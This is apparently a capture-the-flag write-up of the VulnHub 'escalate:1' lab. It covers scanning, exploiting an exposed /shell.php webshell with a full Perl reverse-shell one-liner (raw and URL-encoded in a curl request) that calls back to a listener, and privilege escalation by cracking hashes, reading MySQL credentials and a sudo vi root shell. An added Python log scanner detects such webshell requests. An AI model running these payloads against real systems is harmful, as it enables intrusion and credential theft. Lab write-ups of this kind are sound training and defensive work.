vulnhub-wp escalate:1

🖳 host discovery

```
sudo netdiscover -r 192.168.165.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP              At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.165.14   c6:3b:70:2b:33:1e      1      60  Unknown vendor
 192.168.165.60   08:00:27:ea:fe:25      1      60  PCS Systemtechnik GmbH
 192.168.165.196  20:1e:88:ad:fc:55      1      60  Intel Corporate
```

The target is 192.168.165.60.

👁 service scan

nmap scan

```
sudo nmap -p- -sV -sC -Pn -oN nmap --min-rate 8000 192.168.165.60
···
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      39060/udp   mountd
|   100005  1,2,3      39568/udp6  mountd
|   100005  1,2,3      52275/tcp   mountd
|   100005  1,2,3      53503/tcp6  mountd
|   100021  1,3,4      33553/tcp6  nlockmgr
|   100021  1,3,4      39193/tcp   nlockmgr
|   100021  1,3,4      53493/udp   nlockmgr
|   100021  1,3,4      56884/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp  open  nfs         3-4 (RPC #100003)
35337/tcp open  mountd      1-3 (RPC #100005)
39193/tcp open  nlockmgr    1-4 (RPC #100021)
52275/tcp open  mountd      1-3 (RPC #100005)
56035/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 08:00:27:EA:FE:25 (Oracle VirtualBox virtual NIC)
Service Info: Host: LINUX
···
```

🚪🚶 get shell

path brute-force

```
gobuster dir -u http://192.168.165.60 -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.165.60
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/shell.php            (Status: 200) [Size: 29]
Progress: 5163 / 5164 (99.98%)
===============================================================
Finished
===============================================================
```

gobuster finds a webshell page, /shell.php, which takes a command in its cmd parameter. We use it to get a shell with the payload below (a reverse shell back to our listener at 192.168.165.130:443):

```
perl -e 'use Socket;$i="192.168.165.130";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'
```

URL-encode it (https://www.urlencoder.org/) to get the final payload:

```
curl http://192.168.165.60/shell.php?cmd=perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.165.130%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22bash%20-i%22%29%3B%7D%3B%27
```
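Seen from the server side, a request like the one above leaves an obvious trace in the Apache access log. The following added example (not part of the original writeup) parses combined-format log lines, URL-decodes the query parameters and flags requests that pass shell commands to a web script; the log lines are constructed, with the second one carrying the exact encoded request from this writeup, and the parameter-name list is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format; only the fields needed for triage are captured.
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Parameter names commonly used by simple "?cmd=" webshells (constructed list).
SHELL_PARAMS = {"cmd", "c", "exec", "command", "execute", "run", "code", "func"}

# Patterns showing that a decoded parameter value is a command rather than data.
INDICATORS = [
    ("interpreter one-liner", re.compile(r"\b(?:perl|python[23]?|php|ruby)\s+-[ec]\b")),
    ("interactive shell", re.compile(r"\b(?:ba)?sh\s+-i\b")),
    ("socket/connect", re.compile(r"use\s+Socket|socket\(|/dev/tcp/")),
    ("network tool", re.compile(r"\b(?:nc|ncat|netcat|wget|curl)\b")),
]

def analyze_target(target):
    """Return (param, decoded_value, indicator_labels) for the first suspicious
    query parameter of a request target, or None if nothing looks like a command."""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; also catch double encoding
        hits = [label for label, rx in INDICATORS if rx.search(decoded)]
        if hits or name.lower() in SHELL_PARAMS:
            return name, decoded, hits
    return None

def scan_log(text):
    """Scan access-log text; return one finding dict per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        hit = analyze_target(m["target"]) if m else None
        if hit is None:
            continue
        param, command, indicators = hit
        findings.append({"client": m["client"], "path": urlsplit(m["target"]).path,
                         "param": param, "command": command, "indicators": indicators,
                         # command indicators => high; bare webshell-style parameter => medium
                         "severity": "high" if indicators else "medium"})
    return findings

# Constructed sample lines; the second carries the encoded request from this writeup.
SAMPLE_LOG = """\
192.168.165.130 - - [16/Mar/2024:21:02:11 +0800] "GET /index.html HTTP/1.1" 200 10918 "-" "Mozilla/5.0"
192.168.165.130 - - [16/Mar/2024:21:05:43 +0800] "GET /shell.php?cmd=perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.165.130%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22bash%20-i%22%29%3B%7D%3B%27 HTTP/1.1" 200 29 "-" "curl/8.5.0"
192.168.165.130 - - [16/Mar/2024:21:06:02 +0800] "GET /shell.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.5.0"
"""
```

Running `scan_log(SAMPLE_LOG)` rates the reverse-shell request high (interpreter, interactive shell and socket indicators all match) and the bare `cmd=id` request medium, while the index page request is ignored.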

🛡️ PE

No.1 user3/shell PE

Enumerating manually, we find a shell binary in /home/user3.

No.2 user5 PE

In /home/user5 there is a script binary. After running the commands from user5's .bash_history, we can get the hashes of all users,
and we can crack root's password: root:12345

No.3 user8 PE

From user8's history we find the MySQL config file, and in it the MySQL password.

With it we select the users' passwords from MySQL,

and so find the credentials of all users.

user2

user2 can use user1's commands, but we don't have user1's password. We guess that user1's password follows the same format, user1@12345, and trying it confirms this.

user8

user8 has sudo for vi, so we get a root shell through vi (GTFOBins).

📖 recommended articles

Because my ability was limited and I was tired that night, I only found this way to PE. The author says there are 12+ ways of PE.

escalate:1 download
another walkthrough

https://rightevil.github.io/vulnhub-wp-escalate-1/
Author: rightevil
Published: 16 March 2024
License